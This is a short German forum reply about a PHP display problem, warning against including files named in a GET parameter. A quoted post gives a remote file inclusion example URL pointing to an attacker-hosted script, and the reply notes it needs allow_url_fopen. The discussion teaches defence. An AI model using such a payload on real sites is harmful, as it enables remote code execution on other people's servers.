dedlfix: Darstellungsfehler mit PHP/HTML

Beitrag lesen

echo $begrüßung;

Also erstmal: Include NIE!!!! etwas, das du über GET erhalten. Das kann gewaltig in die Hose gehen!

Beruhige dich wieder! :-) Pauschale Aussagen, ohne stichhaltige Begründung helfen auch nicht weiter. Und nein, mehrere Satzzeichen hintereinander sind keine Begründung.

Stell dir mal vor, ich geh hin und mach sowas:
deine_datei.php?menu=http://www.meineadresse.de/ich_hack_dich.txt
Und schon kann ich nach belieben PHP-Code bei dir ausführen.

Das ist so nicht immer wahr. Dazu muss allow_url_fopen eingeschaltet sein. Ja, ich weiß, das ist leider die Voreinstellung.

echo "$verabschiedung $name";